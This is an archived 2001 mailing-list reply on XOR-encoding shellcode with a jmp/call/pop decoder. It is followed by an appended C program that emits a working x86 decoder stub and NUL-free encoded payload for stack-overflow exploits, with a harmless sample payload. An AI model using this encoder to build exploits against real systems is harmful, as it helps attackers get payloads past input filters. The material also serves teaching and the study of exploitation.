Vulnerability Development mailing list archives
Re: xor encoding / decoding of shellcode
From: blitzkrieg <nyse () inwind it>
Date: Wed, 28 Nov 2001 20:22:09 +0100
On Wed, Nov 28, 2001 at 12:31:54PM -0500, KF wrote:
> with null. I have been trying to figure out how the stack needs to be
> laid out in order for me to xor encode / decode my shellcode.
> I imagine it is similar to <nops><xor decoder><xor encoded
> shellcode><return addy>. At the moment I am stuck on how to place a
> xor encoded string on the stack and then use it as executable code.
> In essence I need to learn how to write a xor decoder. Does anyone have
> any tips on this technique?
Perhaps I'm going wrong... but in AT&T syntax you can try something
like this. I think it is the same on PPC.
[...]
        jmp encoded                 # 1. jump forward to the call
decoder:
        pop %esi                    # 3. %esi = return address the call pushed,
                                    #    i.e. the address of shellcode:
[...]
        xorl $yourkey, 0xYY(%esi)   # where YY is the offset (from shellcode:) of the
                                    # word that you've encoded; one xorl per encoded
                                    # word, and $ marks the key as an immediate
[...]
        jmp shellcode               # 4. jump over the call into the decoded bytes
encoded:
        call decoder                # 2. push the address of shellcode:, go back up
shellcode:
[...]
        your shellcode              # stored xor-encoded with yourkey; executed only
[...]                               # after the decoder has restored it in place
bye bye
--blitzkrieg
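The jmp/call/pop trick above relies on the `call` pushing the address of the byte that follows it, which `pop %esi` then turns into a pointer to the encoded payload. The following C program is an added example, not code from the thread: it emits a 20-byte 32-bit x86 decoder stub of that shape, picks an XOR key so that neither the stub nor the encoded payload contains a NUL byte, and then runs a C model of what the stub does so the round trip can be checked without executing native code. It generalizes the post's per-word `xorl` with fixed offsets into a byte loop (`mov cl, LEN` / `loop`), which is why the payload is limited to 255 bytes. The payload bytes, the function names (`pick_key`, `build_encoded`, `simulate_decoder`, `roundtrip_ok`) and the stub layout are this example's own assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 32-bit x86 jmp/call/pop XOR decoder stub (assumed layout for this example).
 * Offsets are into the emitted buffer; the stub itself contains no 0x00 byte
 * as long as LEN and KEY are non-zero.
 *  0: EB 0D           jmp short getpc
 *  2: 5E              decoder: pop esi           ; esi = address of payload
 *  3: 31 C9           xor ecx, ecx
 *  5: B1 <LEN>        mov cl, LEN                ; patched at STUB_LEN_OFF
 *  7: 80 36 <KEY>     dloop: xor byte [esi], KEY ; patched at STUB_KEY_OFF
 * 10: 46              inc esi
 * 11: E2 FA           loop dloop                 ; rel8 -6 -> back to dloop
 * 13: EB 05           jmp short payload          ; skip over the call
 * 15: E8 EE FF FF FF  getpc: call decoder        ; rel32 -18, pushes &payload
 * 20:                 payload: encoded bytes follow here
 */
static const uint8_t STUB[] = {
    0xEB, 0x0D,
    0x5E,
    0x31, 0xC9,
    0xB1, 0x00,
    0x80, 0x36, 0x00,
    0x46,
    0xE2, 0xFA,
    0xEB, 0x05,
    0xE8, 0xEE, 0xFF, 0xFF, 0xFF,
};
#define STUB_SIZE    (sizeof STUB)
#define STUB_LEN_OFF 6
#define STUB_KEY_OFF 9

/* Constructed stand-in for raw shellcode: it deliberately contains 0x00
 * bytes, which is exactly what the encoding has to hide from strcpy(). */
static const uint8_t SAMPLE[] = { 0x31, 0xC0, 0x00, 0x00, 0x90, 0x00, 0xCC };
#define SAMPLE_LEN (sizeof SAMPLE)

/* Smallest non-zero key such that p[i] ^ key != 0 for every payload byte,
 * i.e. a byte value that does not occur in the payload. -1 if none exists. */
int pick_key(const uint8_t *p, size_t n) {
    int seen[256] = { 0 };
    for (size_t i = 0; i < n; i++) seen[p[i]] = 1;
    for (int k = 1; k < 256; k++) if (!seen[k]) return k;
    return -1;
}

/* 1 if any byte in b[0..n) is 0x00 (would terminate a C-string copy). */
int has_nul(const uint8_t *b, size_t n) {
    for (size_t i = 0; i < n; i++) if (b[i] == 0) return 1;
    return 0;
}

/* Write stub + XOR-encoded payload into out. Returns total length, or 0 if
 * the payload is empty, longer than 255 bytes, has no usable key, or does
 * not fit in cap bytes. */
size_t build_encoded(const uint8_t *p, size_t n, uint8_t *out, size_t cap) {
    if (n == 0 || n > 255 || cap < STUB_SIZE + n) return 0;
    int key = pick_key(p, n);
    if (key < 0) return 0;
    memcpy(out, STUB, STUB_SIZE);
    out[STUB_LEN_OFF] = (uint8_t)n;
    out[STUB_KEY_OFF] = (uint8_t)key;
    for (size_t i = 0; i < n; i++) out[STUB_SIZE + i] = p[i] ^ (uint8_t)key;
    return STUB_SIZE + n;
}

/* C model of the stub: read LEN and KEY from the bytes the stub would use,
 * XOR the payload in place into out, and return the decoded length. */
int simulate_decoder(const uint8_t *blob, size_t total, uint8_t *out) {
    if (total < STUB_SIZE) return -1;
    size_t len = blob[STUB_LEN_OFF];
    uint8_t key = blob[STUB_KEY_OFF];
    if (total < STUB_SIZE + len) return -1;
    for (size_t i = 0; i < len; i++) out[i] = blob[STUB_SIZE + i] ^ key;
    return (int)len;
}

/* Full check: encode, confirm no NUL survives, decode, compare. */
int roundtrip_ok(const uint8_t *p, size_t n) {
    uint8_t blob[STUB_SIZE + 255], back[255];
    size_t total = build_encoded(p, n, blob, sizeof blob);
    if (total != STUB_SIZE + n || has_nul(blob, total)) return 0;
    if (simulate_decoder(blob, total, back) != (int)n) return 0;
    return memcmp(back, p, n) == 0;
}

int main(void) {
    uint8_t blob[STUB_SIZE + 255];
    size_t total = build_encoded(SAMPLE, SAMPLE_LEN, blob, sizeof blob);
    for (size_t i = 0; i < total; i++) printf("\\x%02x", blob[i]);
    printf("\nround trip %s\n", roundtrip_ok(SAMPLE, SAMPLE_LEN) ? "ok" : "FAILED");
    return 0;
}
```

The emitted buffer is what would sit on the stack in the `<nops><xor decoder><xor encoded shellcode><return addy>` layout from the question; only the stub needs to be NUL-free by construction, the payload becomes NUL-free through the key choice. Executing the stub for real requires a 32-bit x86 process and a writable, executable region (the stack, as the poster intends), because the decoder modifies the bytes right behind it; this program only verifies the encoding and the stub's byte-level semantics.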